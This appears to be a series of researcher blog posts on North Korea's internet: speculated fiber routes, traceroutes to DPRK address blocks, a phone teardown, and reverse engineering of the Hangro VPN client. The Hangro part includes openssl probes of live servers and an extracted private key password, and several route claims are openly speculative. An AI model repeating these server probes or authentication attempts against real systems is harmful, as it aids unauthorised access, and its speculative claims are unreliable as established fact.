The Pyongra line also crosses through the mountains at points but it is assumed at certain junctions the fiber was laid along the AH 6/National Highway 7 up the coast as there are parts of the line discovered that do not have a path along the tracks. In these places it is assumed they follow the road, although finding pictures of the highway to further examine is challenging.

Lastly at certain stations we can see utility boxes along the side of the track suggesting buried conduits/cables are laid along the tracks.

From a video taken in 2012 there does appear to be some signs of objects along the tracks, although difficult to confirm due to the video quality. The screenshot below is the clearest I could find of a rectangular box buried in a clearing along the line.

Based on this information of what is confirmed and looking at major cities, it appears there is a route that follows Pyongyang → Wonsan → Hamhung → Chongjin → Rajin → Tumangang which follows the Pyongra line as well as the AH 6/National Highway 7 up the coast. The following map highlights a rough path.

Interestingly by mapping out the possible fiber locations we can start to draw conclusions based on other sources. According to a video by Cappy’s Army he proposes that when the US Navy Seals landed in NOrth Korea in 2019 the most likely place this would have occurred is Sinpo. As the goal was to depoy a covert listening device this could also line up with supporting the idea that a fiber backbone runs down the east coast of North Korea as Sinpo would be relatively close.

What Does This Mean For the Network?

In addition to the fiber link via Russia, the other fiber optic cable into North Korea comes in via China by way of Sinuiju and Dandong. Although we don’t know for sure where servers are deployed inside North Korea, based on the map of Kwangmyong the first assumption is that things are mainly centralized in Pyongyang.

Out of the 1,024 IPs assigned to North Korea we observe the following behavior based on the CIDR block:

• 175.45.176.0/24 is exclusively routed via China Unicom
• 175.45.177.0/24 is exclusively routed via Russia TransTelekom
• 175.45.178.0/24 is dual-homed and can take either path before crossing into North Korea

With this information in mind, running a traceroute with the TCP flag set gives us a slightly better look at how traffic behaves once it reaches the country. For the following tests we’re going to assume there is a fiber path on the west coming in from China toward Pyongyang, as well as a path on the east side coming from Russia.

From the US east coast to 175.45.176.71, the final hop in China before entering North Korea shows roughly 50 ms of additional latency before reaching the DPRK host. This suggests there may be extra devices, distance, or internal routing inside the country before the packet reaches its final destination.

10 103.35.255.254 (103.35.255.254) 234.306 ms 234.082 ms 234.329 ms
11 * * * 
12 * * * 
13 * * * 
14 175.45.176.71 (175.45.176.71) 296.081 ms 294.795 ms 294.605 ms 
15 175.45.176.71 (175.45.176.71) 282.938 ms 284.446 ms 282.227 ms

Interestingly, running a traceroute to 175.45.177.10 shows a similar pattern in terms of missing hops, but with much lower internal latency. In fact, the ~4 ms difference between the last Russian router and the DPRK host suggests the handoff between Russia and North Korea happens very close—network-wise—to where this device is located. This contrasts with the China path, which appears to take a longer or more complex route before reaching its final destination.

10	188.43.225.153	185.192 ms	183.649 ms	189.089 ms
11	 * 	 * 		 
12	 * 	 * 		 
13	 * 	 * 		 
14	175.45.177.10	195.996 ms	186.801 ms	186.353 ms
15	175.45.177.10	188.886 ms	201.103 ms	193.334 

If everything is centralized in Pyongyang this would mean the handoff from Russia is completed in Pyongyang as well. However, it could also indicate that 175.45.177.0/24 is not hosted in Pyongyang at all and is instead located closer to the Russia–North Korea border. More testing is definitely required however before any conclusions can be drawn about where these devices physically reside.

What can we learn from all of this?

Making some assumptions we can get a better idea of how the internet works and is laid out inside North Korea. While not much is officially confirmed using some other sources we can get a possible idea of how things work. As mentioned at the start, the word assume does a lot of heavy lifting. However if you do have other information or ideas feel free to reach out at contact@nkinternet.com

While it’s pretty well known that the DPRK is assigned ASN131279 there are a handful of other ranges that they seemingly have access to. Based on the names these appear to be assigned to the DPRK via Russia TransTelekom

And while not as explicitly named they are also using

These make sense as both 20485 and 134544 are upstream peers of ASN 131279

There are also a handful of other ranges that they are leveraging. The first two are also part of TTK and the final one I haven’t seen evidence of being in use but the abuse contact email for the IPs are postmaster@silibank.com and the company listed is Liaoning Clear channel data Communication, Inc which is right over the border from the DPRK in China.

Now, I’ve been working on some more detailed infrastructure write ups but one thing that stood out last year was a note on an ITW account that listed information about proxying traffic via Russia and Hong Kong. Note is below:

The following IPs are also used for traffic leaving the country via NetKey/OConnect

• 45.126.3.252
• 83.234.227.41

In Lumen’s 2024 Smart Phones of North Korea report the Arirang 182 was noted as not having a lot of information currently available about it, so it seemed like a good time to see if we can learn more about the phone.

I recently had an opportunity to acquire the phone which included the complete box and packaging. I put a picture up on twitter when it came in but I’ve had some more time to look over the phone a little more.

According to the side of the box the phone has a 2.4 inch screen with a resolution of 320×240. While the cameras are not great one thing of note is that the side shows that the phone is IP68 rated. This appears to be designed as a rugged phone. This is also shown on the other side of the box which shows that the phone can be dropped from a height of 2m and survive being under water up to a depth of 1.5m.

The front and back of the phone have the Arirang logo. The back also has IP68 on the back of the phone. The two screws on the back plate of the phone are where the battery and SIM card are inserted which seems to be in line with the rugged design of the phone. There is also a texture on the front and side of the phone for easily holding the phone.

I was able to get the phone into English and digging through some of the settings shows some interesting options. Connecting to the internet is not available on the phone even with a SIM card in the phone. There is also a certificate manager in there which assuming would have additional certificates loaded from DPRK when activated in the country.

The box also came with the full set of accessories. The small key is for taking off the back plate to install the battery and SIM card.

While the back camera doesn’t produce the best pictures one interesting thing was transferring photos between the phone and my phone. I was able to share the photo I took over Blutetooth to my phone but trying to share the photo back over Bluetooth resulted in an error each time when I tried to transfer any photo. This seems to be similar to behavior observed on other DPRK Android phones that block outside media.

Cards for tracking repairs

Some interesting notes from inside the manual:

• For questions about the phone and a users subscription they can dial 999
• No warranty on the phone
• Manual calls out specifically sharing vcf files for sharing contacts.

If you haven’t seen part 1, it provides an overview of the service as well as the domains and IPs supporting the infrastructure.

Continuing my analysis of the Hangro VPN IPs and service I started querying the IPs directly as well as started taking some first steps towards reversing an older sample of the Hangro VPN client. Using OpenSSL as well as a few other tools provided some additional details on how the VPN functions. This post dives further into how the Hangro client authenticates, as well as some recent sightings of Hangro in the wild.

Handshake Failures

Across the four IPs 175.45.176.21, 175.45.176.22, 188.43.136.115, and 188.43.136.116 they all share a common certificate on port 7443. For the sake of brevity I’ve posted a few snippets throughout the post, the full certificate will be available at the end. Querying these IPs directly resulted in a handshake failure.

# openssl s_client -connect 175.45.176.21:7443 -tls1_2

CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = hangro.net.kp
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 CN = hangro.net.kp
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 CN = hangro.net.kp
verify return:1

40B0FA76:error:0A00007B:SSL routines:tls_process_key_exchange:bad signature:../ssl/statem/statem_clnt.c:2306:

Certificate chain
0 s:CN = hangro.net.kp
i:CN = hrra2024
a:PKEY: id-ecPublicKey, 384 (bit); sigalg: ecdsa-with-SHA384

v:NotBefore: May 27 03:39:46 2024 GMT; NotAfter: May 26 03:39:46 2029 GMT

We can see that the server responds with a certificate CN = hangro.net.kp and is signed by hrra2024 which could be assumed to be an internal CA. In this case, our query fails as OpenSSL doesnt have the full certificate chain and can’t verify the signature.

Reverse Engineering the Hangro Client

To get a better idea of how the VPN client works I started reverse engineering an older sample that I had. This resulted in several interesting findings into how the client authenticates:

• Local certificate retrieval. Before the connection to the Hangro server is initiated the client connects to 127.0.0.1 over a local socket on port 6279 to retrieve a PEM-encoded certificate

	push    offset cp       ; "127.0.0.1"
	call    ds:__imp_inet_addr
	mov     dword ptr [ebp+name.sa_data+2], eax
	push    1877h           ; hostshort
	call    ds:__imp_htons
	mov     word ptr [ebp+name.sa_data], ax

	push offset "-----BEGIN CERTIFICATE-----"
	call sub_4117A0

• Embedded private key. There’s also an embded private key in the client that is decrypted with the password 1234

        mov     ecx, 53h ; 0x53 * 4 bytes = 332 bytes
        mov     esi, offset aBeginEncrypted ; "-----BEGIN ENCRYPTED PRIVATE KEY-----"
        lea     edi, [ebp+Src]
        
        push    offset a1234         ; "1234"
        mov     eax, [ebp+lpMem]
        push    eax                  ; context with the encrypted PEM
        call    sub_424A30           ; decrypts the private key
        add     esp, 4

• Local certificate validation. Before the initial TLS handshake is initiated the client validates the certificate retrieved in step 1 locally and if it doesn’t pass the built-in checks the client will not attempt to connect to the Hangro server.
• GOST cipher references. There are multiple strings referecing GOST algorithms which suggest potential Russian influence. These appear several times where the client intializes and enumerates cipher suites

        "gost94"
        "GOST R 34.10-94"
        "GOST89"

• External authentication libraries. One of the DLLs imported FT_ET99_API.dll has several imported functions that suggest external authentication may be used. In addition there is code that tries to run USBToken.exe

        et_FindToken
        et_OpenToken
        et_Verify
        et_ChangeUserPIN
        et_CloseToken

Additional testing

With some more details on how the client works, the first thing that I tried was installing GOST cipher suites to see if that had any different results when connecting. This just shows that the sever currently doesnt support GOST:

openssl s_client -connect 175.45.176.21:7443 -cipher GOST2001-GOST89-GOST89
CONNECTED(00000003)

4080FA76:error:0A000410:SSL routines:ssl3_read_bytes:sslv3 alert handshake          failure:../ssl/record/rec_layer_s3.c:1605:SSL alert number 40

no peer certificate available

No client certificate CA names sent

SSL handshake has read 7 bytes and written 255 bytes

Verification: OK

New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent

Verify return code: 0 (ok)

Generating a test certificate

Since I had a decrypted private key I attempted to generate a self-signed certificate to see if it would proceed further. In this case the handshake progressed beyond ServerHello but failed during the signature verification which confirmed that the server expects the certificate to be signed by hrra2024

error:0A00007B:SSL routines:tls_process_key_exchange:bad signature

Interestingly when using gnuTLS and digging into it further revealed the following which shows the Hangro server’s certificate was flagged for Client Authentication but is lacking the Server Authentication purpose

looking for key purpose '1.3.6.1.5.5.7.3.1', but have '1.3.6.1.5.5.7.3.2'

Is Hangro still used today?

The sample that I have appears to be a few years older but one thing that Ive been wondering is if Hangro is still in use. Trend Micro wrote a great blog that goes into detail about the link between Russia and the DPRK (thanks for the shout out!)

Several people actually recently wrote in and shared that the Hangro icon has recently appears on the site https://ps.ppokkugi.com

Even more interesting is the source code on the page that notes that the icon is a “service for visitors away from home”

<img src="/imgsrvc?i=hangro" title="조국으로부터 떨어져계시는 방문자들을 위한 봉사" onclick="openPage('오유!관리부에련락하십시오!')">

This seems to provide further support the idea that Hangro is a VPN client used by North Koreans overseas to establish connectivity back to the country.

Interestingly, as of around July 18 2025 the Hangro icon no longer appears on the site.

Going Forward

From this it looks like Hangro uses mTLS to support authentication as part of the VPN service and requires a valid certificate signed by hrra2024. I haven’t been able to find if the cert requested on the client on port 6279 is part of Hangro or a different service that needs to be running.

Based on what has been discovered so far and looking through some of the other files and a few packet captures it looks like Hangro is derived from SoftEther an open source VPN project maintained by the University of Tsukuba. The included driver that is installed matches with SoftEther and the traffic seems to be similar to the Ethernet over SSL option in SoftEther.

There’s also additional applications like a chat and mail program that are installed as well that could have some interesting information.

There’s still more to explore regarding Hangro’s capabilities. A third part is definitely going to be required to go over some of the functions in Hangro that may provide some additional clues as to what a user is able to access once authenticated. If anyone has any up to date samples that they can share please reach out. And of course if you’re a security company or a three letter agency feel free to reach out as well contact@dprkinternetwatch.com